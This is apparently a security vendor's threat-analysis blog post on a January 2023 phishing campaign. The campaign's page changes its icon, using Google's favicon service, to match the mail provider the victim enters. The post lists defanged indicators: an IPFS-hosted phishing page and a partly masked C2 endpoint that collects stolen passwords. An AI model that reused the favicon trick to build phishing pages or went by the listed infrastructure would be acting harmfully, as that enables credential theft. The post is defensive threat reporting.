The ASEC analysis team continuously monitors phishing emails, and we have been detecting multiple phishing emails that are distributed with a changing icon to reflect the mail account service entered by the user. The following is an email distributed on January 16, 2023, warning users that their account will be shut down, prompting them to click the ‘Reactivate Now’ link if they need their account kept active. The linked phishing page steals the user’s email account and password.
Figure 1. Distributed email
There are a few noticeable differences in the link page above compared to the previous cases. In the past, the user email address was autocompleted, so the user only needed to enter their password. However, this phishing case required users to also enter their email addresses. According to the mail service type listed behind “@”, the icon of the phishing page changes. It seems that the threat actor used the favicon feature supported by Google. Favicons are icons that represent websites or web pages. Entering the desired ‘website address’ beneath the URL below will allow you to obtain the favicon of the page, courtesy of Google.
- Shortened URL of the linked phishing page: shorturl.at/DGNU2#******.lee@***.com
- URL of the actual phishing page: hxxps://ipfs[.]io/ipfs/QmRgn9xHYkCoGyj39wQBwfYo7MZ2dtJEh1h9RQ5hcyBqGa?filename=logsinfo.html
- Google favicon: https://www.google.com/s2/favicons?domain=’websiteaddress’
Figure 2. Previously distributed email and phishing page
Figure 3. NAVER favicon
Figure 4. DAUM favicon
Figure 5. Google favicon
The account credentials entered on the page were sent to a particular C2, and the address of this C2 is the same domain as that covered in a blog post published in January 2023 about a phishing web server. From this, we can assume that the same threat actor is performing phishing attacks in various formats. As phishing attacks are occurring in a variety of ways, users must be particularly cautious when opening emails.
- C2 : hxxps://jy****ud[.]com/service2/online/dollar/sure/logs/gen.php
[IOC Info]
- hxxps://ipfs[.]io/ipfs/QmRgn9xHYkCoGyj39wQBwfYo7MZ2dtJEh1h9RQ5hcyBqGa?filename=logsinfo.html
- hxxps://jy****ud[.]com/service2/online/dollar/sure/logs/gen.php
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post A Phishing Page that Changes According to the User’s Email Address (Using Favicon) appeared first on ASEC BLOG.
Article Link: A Phishing Page that Changes According to the User's Email Address (Using Favicon) - ASEC BLOG